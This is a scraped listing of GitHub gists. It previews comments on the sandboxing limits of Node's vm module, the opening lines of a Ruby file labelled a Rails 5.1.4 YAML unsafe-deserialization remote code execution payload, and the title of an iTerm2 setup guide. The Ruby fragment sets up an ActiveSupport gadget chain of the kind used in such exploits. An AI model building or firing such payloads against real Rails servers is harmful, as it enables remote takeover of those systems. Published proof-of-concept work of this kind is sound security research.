This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //////// | |
| // The vm module lets you run a string containing javascript code 'in | |
| // a sandbox', where you specify a context of global variables that | |
| // exist for the duration of its execution. This works more or less | |
| // well, and if you're in control of the code that's running, and you | |
| // have a reasonable protocol in mind// for how it expects a certain | |
| // context to exist and interacts with it --- like, maybe a plug-in | |
| // API for a program, with some endpoints defined for it that do | |
| // useful domain-specific things --- your life can go smoothly. |
niklasb
/ railspwn.rb
Last active
March 7, 2021 12:14
Rails 5.1.4 YAML unsafe deserialization RCE payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'yaml' | |
| require 'base64' | |
| require 'erb' | |
| class ActiveSupport | |
| class Deprecation | |
| def initialize() | |
| @silenced = true | |
| end | |
| class DeprecatedInstanceVariableProxy |
kevin-smets
/ iterm2-solarized.md
Last active
June 19, 2025 14:33
iTerm2 + Oh My Zsh + Solarized color scheme + Source Code Pro Powerline + Font Awesome + [Powerlevel10k] - (macOS)